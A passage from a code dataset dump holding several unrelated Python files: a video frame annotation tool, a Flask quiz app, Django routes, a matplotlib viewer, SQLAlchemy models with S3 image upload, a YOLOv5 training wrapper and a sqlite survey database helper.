flags=cv2.INTER_LINEAR)\r\n return result\r\n\r\n def finishTracking(self, frameID):\r\n for key, cat in self.objects.items():\r\n if cat.endFrame is None:\r\n cat.endTrack(frameID)\r\n\r\n def input_message(self, title, message):\r\n root = tk.Tk()\r\n root.geometry('400x400+400+400')\r\n root.withdraw()\r\n # the input dialog\r\n mess = simpledialog.askstring(title=title, prompt=message)\r\n print(\"Input message: \" + str(mess))\r\n return mess\r\n\r\n def extract_coordinates(self, event, x, y, flags, parameters):\r\n # Record starting (x,y) coordinates on left mouse button click\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n self.image_coordinates = [(x, y)]\r\n self.extract = True\r\n\r\n # Record ending (x,y) coordintes on left mouse bottom release\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n self.image_coordinates.append((x, y))\r\n self.extract = False\r\n self.selected_ROI = True\r\n\r\n # Draw rectangle around ROI\r\n cv2.rectangle(self.clone, self.image_coordinates[0], self.image_coordinates[1], (0, 255, 0), 2)\r\n\r\n # Clear drawing boxes on right mouse button click\r\n elif event == cv2.EVENT_RBUTTONDOWN:\r\n self.clone = self.frame.copy()\r\n self.selected_ROI = False\r\n\r\n def crop_ROI(self):\r\n if self.selected_ROI:\r\n cropped_frame = self.clone.copy()\r\n x1 = self.image_coordinates[0][0]\r\n y1 = self.image_coordinates[0][1]\r\n x2 = self.image_coordinates[1][0]\r\n y2 = self.image_coordinates[1][1]\r\n\r\n cropped_image = cropped_frame[y1:y2, x1:x2]\r\n print('Cropped image: {} {}'.format(self.image_coordinates[0], self.image_coordinates[1]))\r\n return cropped_image\r\n else:\r\n print('Select ROI to crop before cropping')\r\n\r\n def show_cropped_ROI(self, cropped_image, name):\r\n cv2.imshow(name, cropped_image)\r\n cv2.moveWindow(name, 0, (len(self.images)%5)*100)\r\n cv2.resizeWindow(name, 200, 100)\r\n\r\n def marking_ROI(self, img, name, id):\r\n self.clone = img.copy()\r\n cv2.namedWindow('image')\r\n cv2.setMouseCallback('image', self.extract_coordinates)\r\n self.images[id] = self.crop_ROI()\r\n while True:\r\n key = cv2.waitKey(2)\r\n cv2.imshow('image', self.clone)\r\n\r\n # Crop and display cropped image\r\n if key == ord('c'):\r\n aux = self.images[id]\r\n self.images[id] = self.crop_ROI()\r\n try:\r\n self.show_cropped_ROI(self.images[id], name + \"_\" + str(id))\r\n except:\r\n print(\"Error while capturing frame\")\r\n self.marking_ROI(img, name, id)\r\n break\r\n\r\n def main(self):\r\n # Parse arguments\r\n video_path, delay, scale, marking = self.parse_arguments()\r\n result_file = video_path.split('.')[0] + \".txt\"\r\n # Video processing\r\n if not video_path:\r\n print('Please execute command wih : python frame_annotation.py -v <Video_Path>')\r\n sys.exit()\r\n cap = cv2.VideoCapture(video_path)\r\n w, h = (cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n print(\"Width: \" + str(w))\r\n print(\"Height: \" + str(h))\r\n rotate=False\r\n if w > h:\r\n rotate = True\r\n\r\n # Exit if video not opened.\r\n if not cap.isOpened():\r\n print('Could not open {} video'.format(video_path))\r\n sys.exit()\r\n\r\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n id = 0\r\n frameId = 0\r\n\r\n # Loop over the video frames\r\n while (cap.isOpened()):\r\n r, self.frame = cap.read()\r\n\r\n # Re-scaling the frame to the desired resolution --> make to easy the display\r\n resized_dims = (int(w / scale), int(h / scale))\r\n resized_frame = cv2.resize(self.frame, resized_dims, interpolation=cv2.INTER_AREA)\r\n img = resized_frame\r\n\r\n if rotate:\r\n img = self.rotate_image(resized_frame, 270)\r\n\r\n if r:\r\n self.frame=img\r\n time.sleep(delay)\r\n cv2.imshow('image', self.frame)\r\n if frameId == 0:\r\n name = 'annotate'\r\n while name != \"quit\" and name != None:\r\n name = self.input_message(\"START\", \"As first frame, annotate all objects. Click 'Cancel' to continue next frame \")\r\n if name != \"quit\" and name != None:\r\n #MARKING = TRUE --> We have introduced a correct category\r\n if marking:\r\n self.marking_ROI(img, name, id)\r\n self.objects[id] = TrackerObject(name, frameId, id)\r\n id += 1\r\n\r\n k = cv2.waitKey(1) & 0xFF\r\n\r\n # press 'q' to exit\r\n if k == ord('q'):\r\n break\r\n\r\n # press 's' to mark the start of an object detected\r\n elif k == ord('s'):\r\n name = self.input_message(\"START\", \"Introduce the class of the new object detected\")\r\n if name != \"quit\" and name != None:\r\n if marking:\r\n self.marking_ROI(img, name, id)\r\n self.objects[id] = TrackerObject(name, frameId, id)\r\n id += 1\r\n\r\n # press 'f' to mark the final of an object detected\r\n elif k == ord('f'):\r\n name = self.input_message(\"END\", \"Introduce the class of the object that has disappeared\")\r\n IDs = self.check_object(name)\r\n while len(IDs) <= 0:\r\n print(\"Error introducing the category. Introduce it again or 'quit'\")\r\n name = self.input_message(\"END\", \"Category wrong as never introduced. ¿Class objected disappeared? \")\r\n if name == \"quit\" or name == None:\r\n break\r\n IDs = self.check_object(name)\r\n if len(IDs) == 1:\r\n self.objects[IDs[0]].endTrack(frameId)\r\n cv2.destroyWindow(name+\"_\"+str(IDs[0]))\r\n elif len(IDs) > 1:\r\n index = int(self.input_message(\"END - index\",\"Choose the correct index of the object dissappeared from \" + str(IDs) + \" : \"))\r\n if name != \"quit\" and name != None:\r\n (self.objects[index]).endTrack(frameId)\r\n cv2.destroyWindow(name + \"_\" + str(index))\r\n\r\n frameId += 1\r\n percentage = float(frameId / length) * 100\r\n if (percentage == 100):\r\n self.finishTracking(frameId)\r\n print(\"Trackable objects : \", flush=True)\r\n config = \"Category \\tStartFrame\\tEndFrame\\n\"\r\n for key, cat in self.objects.items():\r\n config += str(cat) + \"\\n\"\r\n print(str(cat), flush=True)\r\n cap.release()\r\n self.write_detection(result_file, config)\r\n # close all window\r\n cv2.destroyAllWindows()\r\n\r\n k = cv2.waitKey(1)\r\n if k == 0xFF & ord(\"q\"):\r\n break\r\n\r\n cap.release()\r\n # close all windows\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == \"__main__\":\r\n annotation = Annotation()\r\n annotation.main()\r\n","sub_path":"FrameIdentification/frame_annotation.py","file_name":"frame_annotation.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"242400235","text":"from flask import Flask, render_template, redirect, url_for\r\n\r\nclass Question:\r\n def __init__(self, name, options, correct_opt):\r\n self.name = name\r\n self.options = options\r\n self.correct_opt = correct_opt\r\n\r\nQuestion1 = Question(\r\n 'Who is the current world champion in Beyblade Burst Surge?',\r\n ('Valt Aoi', 'Aiger Akabane', 'Delta Zakuro', 'Free De La Hoya'),\r\n 'Valt Aoi'\r\n)\r\n\r\nQuestion2 = Question(\r\n 'Who is the only blader of Turbo 4 whose Beyblade wasn\\'t repaired after destruction?',\r\n ('Phi', 'Xavier Bogard', 'Hyde', 'Laban Vanot'),\r\n 'Hyde'\r\n)\r\n\r\nQuestion3 = Question(\r\n 'Who is the only member of Big 5 who wasn\\'t there in the Semi-Finals of International Blader\\'s Cup?',\r\n ('Shu Kurenai', 'Lui Shirosagi', 'Free De La Hoya', 'Silas Karlisle'),\r\n 'Silas Karlisle'\r\n)\r\n\r\nQuestion4 = Question(\r\n 'Which is the 6th season of Beyblade Burst?',\r\n ('Turbo', 'DB', 'Rise', 'Surge'),\r\n 'DB'\r\n)\r\n\r\nQuestion5 = Question(\r\n 'Who is Lain Valhala\\'s partner in Legend Tag League Festival?',\r\n ('Valt Aoi', 'Shu Kurenai', 'Hyuga Hizashi', 'Ranjiro Kiyama'),\r\n 'Shu Kurenai'\r\n)\r\n\r\nglobal Questions\r\nQuestions = [\r\n Question1,\r\n Question2,\r\n Question3,\r\n Question4,\r\n Question5\r\n]\r\n\r\nglobal answers\r\nanswers = []\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/home')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/start')\r\ndef start():\r\n stage = 0\r\n return redirect(url_for('game', stage=stage))\r\n\r\n@app.route('/game/<int:stage>')\r\ndef game(stage):\r\n try:\r\n question = Questions[stage]\r\n return render_template('game.html', ask=question, no=stage+1)\r\n except:\r\n return redirect(url_for('results'))\r\n\r\n@app.route('/change/<int:num>/<value>')\r\ndef change(num, value):\r\n param1 = num\r\n param2 = value\r\n\r\n answers.append(str(param2))\r\n return redirect(url_for('game', stage=param1))\r\n\r\n@app.route('/results')\r\ndef results():\r\n question1 = answers[0]\r\n question2 = answers[1]\r\n question3 = answers[2]\r\n question4 = answers[3]\r\n question5 = answers[4]\r\n\r\n questions = [\r\n question1,\r\n question2,\r\n question3,\r\n question4,\r\n question5\r\n ]\r\n\r\n right_question1 = Questions[0].correct_opt\r\n right_question2 = Questions[1].correct_opt\r\n right_question3 = Questions[2].correct_opt\r\n right_question4 = Questions[3].correct_opt\r\n right_question5 = Questions[4].correct_opt\r\n\r\n rights = [\r\n right_question1,\r\n right_question2,\r\n right_question3,\r\n right_question4,\r\n right_question5\r\n ]\r\n\r\n right_questions = 0\r\n for i in range(5):\r\n if questions[i] == rights[i]:\r\n right_questions += 1\r\n else:\r\n continue\r\n\r\n return render_template('results.html', completed=right_questions)\r\n\r\n@app.route('/')\r\ndef index():\r\n return redirect(url_for('home'))\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=False)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"639146512","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . import views\n\n\nurlpatterns = [\n path('', views.ShiftTopView.as_view(), name='shift_top'),\n path('submit/', views.SubmitView.as_view(), name='submit'),\n path('confirm/', views.ConfirmView.as_view(), name='confirm'),\n]\n\napp_name = 'apply'\n\nrouter = routers.DefaultRouter()\nrouter.register('shift', views.ShiftViewSet)\n","sub_path":"apply/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395648030","text":"import matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\n\ndef viewer(volume, axis=2, **kwargs):\n \"\"\"\n Viewer based on code by Nicolas Barbey\n avalible from: http://nbarbey.github.io/2011/07/08/matplotlib-slider.html\n \"\"\"\n\n # check dim\n if not volume.ndim == 3:\n raise ValueError(\"cube should be an ndarray with ndim == 3\")\n\n # generate figure\n fig = plt.figure()\n ax = plt.subplot(111)\n fig.subplots_adjust(left=0.25, bottom=0.25)\n\n # select first image\n s = [slice(0, 1) if i == axis else slice(None) for i in range(3)]\n im = volume[s].squeeze()\n\n # display image\n l = ax.imshow(im, **kwargs)\n\n # define slider\n axcolor = 'lightgoldenrodyellow'\n ax = fig.add_axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)\n\n slider = Slider(ax, 'Axis %i index' % axis, 0, volume.shape[axis] - 1,\n valinit=0, valfmt='%i')\n\n def update(val):\n ind = int(slider.val)\n s = [slice(ind, ind + 1) if i == axis else slice(None)\n for i in range(3)]\n im = volume[s].squeeze()\n l.set_data(im, **kwargs)\n fig.canvas.draw()\n\n slider.on_changed(update)\n\n plt.show()","sub_path":"isinmrtbx/tools/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"208009820","text":"#!/usr/bin/env python\n\nimport ROOT\n\n# I shouldn't need this! \n# something is broken with rootmaps\nROOT.gSystem.Load(\"libWCPNavDict\")\n\ndef test_make():\n gds = ROOT.WCP.make_example_gds()\n assert gds\n\nif '__main__' == __name__:\n test_make()\n\n","sub_path":"test/test_examplegds.py","file_name":"test_examplegds.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"237607161","text":"from flask_sqlalchemy import SQLAlchemy\nimport base64\nimport boto3\nimport datetime\nfrom io import BytesIO\nfrom mimetypes import guess_extension, guess_type\nimport os\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport random\nimport re\nimport string\nimport bcrypt\n\ndb = SQLAlchemy()\n\nEXTENSIONS = ['png', 'gif', 'jpg', 'jpeg', 'jpe']\nBASE_DIR = os.getcwd()\nS3_BUCKET = 'appdevhackchallenge'\nS3_BASE_URL = f'https://{S3_BUCKET}.s3-us-west-1.amazonaws.com'\n\nplayer_challenge_assoc = db.Table(\n 'player_challenge_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('challenge_id', db.Integer, db.ForeignKey('challenge.id'))\n)\n\nplayer_group_assoc = db.Table(\n 'player_group_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('group_id', db.Integer, db.ForeignKey('group.id'))\n)\n\nplayer_image_assoc = db.Table(\n 'player_image_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('asset_id', db.Integer, db.ForeignKey('asset.id'))\n)\n\nchallenge_image_assoc = db.Table(\n 'challenge_image_assoc',\n db.Column('challenge_id', db.Integer, db.ForeignKey('challenge.id')),\n db.Column('asset_id', db.Integer, db.ForeignKey('asset.id'))\n)\n\nclass Player(db.Model):\n \"\"\"\n Class used to represent Players Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each player\n name: Database column to denote the names of each player\n username: Database column for usernames of each player\n password_digest: Database column for passwords (encoded) of each player\n points: Database column for # of points each player has\n challenges: Denotes what challenge the player is currently doing\n groups: Denotes what groups the player is in\n authored_challenges: Denoted which challenges were created by a player\n asset: Stores a profile picture for a player\n \"\"\"\n\n __tablename__ = 'player'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String, nullable=False)\n password_digest = db.Column(db.String, nullable=False)\n points = db.Column(db.Integer, nullable=False)\n challenges = db.relationship('Challenge', secondary=player_challenge_assoc, back_populates='player')\n groups = db.relationship('Group', secondary=player_group_assoc, back_populates='players')\n authored_challenges = db.relationship(\"Challenge\", cascade=\"delete\")\n asset = db.relationship('Asset', secondary=player_image_assoc, uselist=False, cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.username = kwargs.get('username')\n self.password_digest = bcrypt.hashpw(kwargs.get(\"password\").encode(\"utf8\"), bcrypt.gensalt(rounds=13))\n self.points = 0\n\n def verify_password(self, password):\n return bcrypt.checkpw(password.encode(\"utf8\"), self.password_digest)\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"points\": self.points,\n \"current_challenges\": [c.serialize_condensed() for c in self.challenges if not c.completed],\n \"completed_challenges\": [c.serialize_condensed() for c in self.challenges if c.completed],\n \"groups\": [g.serialize_condensed() for g in self.groups],\n \"authored_challenges\": [c.serialize_condensed() for c in self.authored_challenges],\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n \n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"points\": self.points,\n }\n\nclass Challenge(db.Model):\n \"\"\"\n Class used to represent Challenge Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each challenge\n title: Database column to denote the title of each challenge\n description: Database column for description of each challenge\n claimed: Database column for whether a challenge has been claimed or not\n completed: Database column for whether a challenge has been completed or not\n author_username: Database column for the author username for a challenge\n author_id: Database Column for the author id for a challenge\n group_id: Database Column for group id for a challenge\n player: Denotes what player is partaking in a challenge right now\n asset: Ties a picture to a challenge\n \"\"\"\n \n __tablename__ = 'challenge'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String, nullable=False)\n description = db.Column(db.String, nullable=False)\n claimed = db.Column(db.Boolean, default=False, nullable=False)\n completed = db.Column(db.Boolean, default=False, nullable=False)\n author_username = db.Column(db.String, nullable=False)\n author_id = db.Column(db.Integer, db.ForeignKey(\"player.id\"), nullable=False)\n group_id = db.Column(db.Integer, db.ForeignKey(\"group.id\"))\n player = db.relationship('Player', secondary=player_challenge_assoc, back_populates='challenges')\n asset = db.relationship('Asset', secondary=challenge_image_assoc, uselist=False, cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.title = kwargs.get('title')\n self.description = kwargs.get('description')\n self.claimed = kwargs.get('claimed', False)\n self.completed = kwargs.get('completed', False)\n self.author_username = kwargs.get('author_username')\n self.author_id = kwargs.get('author_id')\n self.group_id = kwargs.get('group_id')\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"description\": self.description,\n \"claimed\": self.claimed,\n \"completed\": self.completed,\n \"author_username\": self.author_username,\n \"author_id\": self.author_id,\n \"group_id\": self.group_id,\n \"player\": [p.serialize_condensed() for p in self.player],\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n\n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"description\": self.description,\n \"claimed\": self.claimed,\n \"completed\": self.completed,\n \"author_username\": self.author_username,\n \"author_id\": self.author_id,\n \"group_id\": self.group_id,\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n\n def serialize_group_id(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"group_id\": self.group_id,\n }\n\nclass Group(db.Model):\n \"\"\"\n Class used to represent Group Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each group\n name: Database column for name of each group\n players: Stores all players in the group\n local_challenges: Stores all challenges within the group\n \"\"\"\n\n __tablename__ = 'group'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n players = db.relationship('Player', secondary=player_group_assoc, back_populates='groups')\n local_challenges = db.relationship(\"Challenge\", cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.name = kwargs.get('name')\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"players\": [p.serialize_condensed() for p in self.players],\n \"challenges\": [c.serialize_condensed() for c in self.local_challenges]\n }\n\n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"name\": self.name\n }\n\nclass Asset(db.Model):\n \"\"\"\n Class used to represent Asset Database (uploading to/downloading from AWS)\n\n Attributes:\n -------\n id: Database column to denote the IDs of each file\n base_url: Database column for base_url of each file\n salt: Database column that represent unique identifier for images\n extension: Database column to store the extensions in each file\n height: Database column for image height\n width: Database column for image width\n created_at: Database column for when file was created\n player_id: Database column for player id (CAN BE NULL)\n challenge_id: Database column for challenge id (CAN BE NULL)\n \"\"\"\n\n __tablename__ = 'asset'\n id = db.Column(db.Integer, primary_key=True)\n base_url = db.Column(db.String, nullable=False)\n salt = db.Column(db.String, nullable=False)\n extension = db.Column(db.String, nullable=False)\n height = db.Column(db.Integer, nullable=False)\n width = db.Column(db.Integer, nullable=False)\n created_at = db.Column(db.DateTime, nullable=False)\n player_id = db.Column(db.Integer, nullable=True)\n challenge_id = db.Column(db.Integer, nullable=True)\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.create(kwargs.get('image_data'))\n self.challenge_id = kwargs.get('challenge_id', None)\n self.player_id = kwargs.get('player_id', None)\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n 'url': f'{self.base_url}/{self.salt}.{self.extension}',\n 'created_at': str(self.created_at),\n 'challenge_id': self.challenge_id if hasattr(self, 'challenge_id') else None,\n 'player_id': self.player_id if hasattr(self, 'player_id') else None\n }\n\n def create(self, image_data):\n \"\"\"\n Tries to create an image from base64 code and upload to Amazon s3 bucket\n\n @param image_data: base64 encoded data of image\n \"\"\"\n try:\n ext = guess_extension(guess_type(image_data)[0])[1:]\n if ext not in EXTENSIONS:\n raise Exception(f'Extension {ext} not supported!')\n \n salt = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for i in range(16))\n \n img_str = re.sub(\"^data:image/.+;base64,\", \"\", image_data)\n img_data = base64.b64decode(img_str)\n img = Image.open(BytesIO(img_data))\n\n self.base_url = S3_BASE_URL\n self.salt = salt\n self.extension = ext\n self.height = img.height\n self.width = img.width\n self.created_at = datetime.datetime.now()\n\n img_filename = f'{salt}.{ext}'\n self.upload(img, img_filename)\n\n except Exception as e:\n print('Error: ', e)\n\n def upload(self, img, img_filename):\n \"\"\"\n Tries to upload image to Amazon s3 bucket\n\n @param img: the image to upload\n @param img_filename: Filename for image\n \"\"\"\n try:\n img_tempdir = f'{BASE_DIR}/uploads/'\n img_temploc = f'{img_tempdir}{img_filename}'\n if not os.path.isdir(img_tempdir):\n os.mkdir(img_tempdir)\n img.save(img_temploc)\n\n s3_client = boto3.client('s3')\n s3_client.upload_file(img_temploc, S3_BUCKET, img_filename)\n\n s3_resource = boto3.resource('s3')\n object_acl = s3_resource.ObjectAcl(S3_BUCKET, img_filename)\n object_acl.put(ACL=\"public-read\")\n os.remove(img_temploc)\n\n except Exception as e:\n print('Upload Failed: ', e)","sub_path":"backend/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"98726698","text":"import os\nimport time\n\nthis_dir = os.path.abspath(__file__)[::-1].split(\"/\", 1)[1][::-1]\n\ndef train(data, output_dir, img_size=640, epochs=50, weights=\"yolov5s.pt\", batch=16):\n images_path, values_path = create_txt_images_from_data(data)\n data_file = create_yaml_data_file(images_path, values_path, len(data[\"class_labels\"]), data[\"class_labels\"])\n\n os.system(f\"python3 {this_dir}/yolov5/train.py --data {data_file} --img {img_size} --epochs {epochs} --weights {weights} --batch {batch} \")\n if os.path.exists(\"runs/train/exp/weights/best.pt\"):\n os.system(f\"mv runs/train/exp/weights/best.pt {output_dir}/{time.time()}.pt\")\n elif os.path.exists(\"runs/train/exp/weights/last.pt\"):\n os.system(f\"mv runs/train/exp/weights/last.pt {output_dir}/{time.time()}.pt\")\n else:\n print(\"Smt went wrong\")\n if os.path.exists(\"runs/train/exp\"):\n os.system(\"rm -r runs/\")\n os.system(\"rm -r easynn_current_data\")\n\n\ndef create_txt_images_from_data(data):\n os.system(\"mkdir easynn_current_data\")\n os.system(\"mkdir easynn_current_data/values\")\n name = data[\"image_files\"][0].split('/')[-1]\n file = data[\"image_files\"][0].split(name)[0]\n os.system(f\"cp -r {file} easynn_current_data/images/\")\n\n\n for file in data[\"image_files\"]:\n file_name = file.split(\"/\")[-1]\n txt_file = file_name[::-1].split('.', 1)[1][::-1]+\".txt\"\n with open(f\"easynn_current_data/values/{txt_file}\", 'w') as f:\n for mark in data[\"marks\"]:\n if file == mark[\"image\"]:\n class_number = data[\"class_labels\"].index(mark[\"label\"])\n x_centre = (mark[\"corners\"][0][0] + mark[\"corners\"][1][0])/2\n y_centre = (mark[\"corners\"][0][1] + mark[\"corners\"][1][1])/2\n width = (-mark[\"corners\"][0][0] + mark[\"corners\"][1][0])\n height = (-mark[\"corners\"][0][1] + mark[\"corners\"][1][1])\n f.write(f\"{class_number} {x_centre} {y_centre} {width} {height}\\n\")\n\n return \"easynn_current_data/images\", \"easynn_current_data/values\"\n\n\ndef create_yaml_data_file(train_dir, val_dir, number_of_classes, classes):\n write_to_yaml = [\n f\"train: {train_dir}\\n\"\n f\"val: {val_dir}\\n\"\n f\"\\n\"\n f\"nc: {number_of_classes}\\n\"\n f\"\\n\",\n f\"names: {classes}\\n\",\n ]\n with open(\"cur_data.yaml\", 'w') as f:\n for line in write_to_yaml:\n f.write(line)\n return \"cur_data.yaml\"\n\n\n\n# data = {\n# 'class_labels': ['asd'],\n# 'image_files': [\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/How-to-Train-Your-Dog-to-Force-Fetch.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg'],\n# 'marks': [\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/How-to-Train-Your-Dog-to-Force-Fetch.jpg',\n# 'label': 'asd', 'corners': [[0.1675, 0.30451127819548873], [0.8825, 0.5488721804511278]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg', 'label': 'asd',\n# 'corners': [[0.355, 0.07518796992481203], [0.8525, 0.6842105263157895]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg', 'label': 'asd',\n# 'corners': [[0.4625, 0.2631578947368421], [0.7475, 0.6992481203007519]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg', 'label': 'asd',\n# 'corners': [[0.065, 0.18352059925093633], [0.875, 0.9700374531835206]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.26755852842809363, 0.13], [0.8494983277591973, 0.52]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.3311036789297659, 0.2925], [0.5852842809364549, 0.5625]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.17391304347826086, 0.2925], [0.5652173913043478, 0.4925]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.4816053511705686, 0.5225], [0.7892976588628763, 0.6475]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg', 'label': 'asd',\n# 'corners': [[0.63, 0.7228464419475655], [0.87, 0.8689138576779026]]}]}\n","sub_path":"src/TrainStarter.py","file_name":"TrainStarter.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"42942040","text":"import sqlite3\nimport os\n\nabs_path = os.getcwd()\n\n\nclass DB_Connector():\n def __init__(self):\n self.con = sqlite3.connect(os.path.join(abs_path, 'db', 'mds_env.db'))\n self.curse = self.con.cursor()\n\n def init_envsurvey(self):\n self.curse.execute(\"\"\"\n create table if not exists mds_env_survey (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n name CHAR(50),\n date date,\n companyname CHAR(50),\n username CHAR(50),\n userphone CHAR(50),\n userepl CHAR(50),\n companylocation CHAR(50),\n latlng CHAR(50),\n huanping CHAR(50),\n reportbook CHAR(50),\n reporttable CHAR(50),\n dengjitable CHAR(50),\n xianchangxiangfu CHAR(50),\n xianchangxiangfu_desc TEXT,\n yanshou CHAR(50),\n yanshou_desc TEXT,\n shengchangongyi TEXT,\n yuanliang TEXT,\n chengping TEXT,\n weixianping CHAR(50),\n wuranqingkuang CHAR(50),\n huanjingjijinyuyan CHAR(50),\n qingjiebianhao CHAR(50),\n wushuiqingkuang CHAR(50),\n dunwei FLOAT(50),\n wushuichuligongyi CHAR(50),\n feiqiqingkuang CHAR(50),\n fengliang FLOAT(50),\n feiqichuligongyi CHAR(50),\n wuni FLOAT(50),\n youqi FLOAT(50),\n jinshu FLOAT(50),\n fenchen FLOAT(50),\n feiqiwutianxiemingcheng FLOAT(50),\n qitashuoming TEXT,\n zaoyinqingkuang CHAR(50),\n pianjian FLOAT(50),\n PAC FLOAT(50),\n PAM FLOAT(50),\n tansuangai FLOAT(50),\n chulinji FLOAT(50),\n nalixianggaizao CHAR(50),\n zhushi TEXT,\n pic TEXT\n )\n \"\"\")\n\n def drop(self):\n self.curse.execute(\"drop table if exists mds_env_survey\")\n\n def close(self):\n self.curse.close()\n self.con.close()\n\n\n\ndef download_all():\n db = DB_Connector()\n db.curse.execute(\"select * from mds_env_survey\")\n data = db.curse.fetchall()\n dt = [i[1:-1] for i in data]\n pics = {i[-1]: i[3] for i in data if i[-1] and i[3]}\n all_cols_table = \"\"\"业务人员,日期,企业名称,业主姓名,业主电话,业主职务,企业地址,经纬度,环评情况,报告书,报告表,登记表,现场相符,不否说明,验收情况,为什么没验收,生产工艺,原辅料,成品,危险品,重点污染,环境应急预案,清洁生产,污水,吨位,污水处理,废气,风量,废气处理,污泥,油漆,金属,粉尘,废弃物,其他物质说明,噪音,片碱,PAC,PAM,碳酸钙,除磷剂,哪里需要改造,注\"\"\"\n cols = all_cols_table.split(',')\n dt = [cols] + dt\n import xlwt, os, zipfile\n wbk = xlwt.Workbook()\n sheet = wbk.add_sheet('Sheet1', cell_overwrite_ok=True)\n for i in range(len(dt)):\n for j in range(len(dt[i])):\n sheet.write(i, j, dt[i][j])\n wbk.save('static/download_all/all.xls')\n for k, v in pics.items():\n if not os.path.exists(os.path.join(os.getcwd(), 'static', 'download_all', v)):\n os.mkdir(os.path.join(os.getcwd(), 'static', 'download_all', v))\n for pic in k.split(','):\n os.system(\"cp db/pics/%s static/download_all/%s/%s\" % (pic, v, pic))\n startdir = os.path.join(os.getcwd(), 'static', 'download_all')\n file_news = os.path.join(os.getcwd(), 'static', 'download_all') + '.zip'\n z = zipfile.ZipFile(file_news, 'w', zipfile.ZIP_DEFLATED)\n for dirpath, dirnames, filenames in os.walk(startdir):\n fpath = dirpath.replace(startdir, '')\n fpath = fpath and 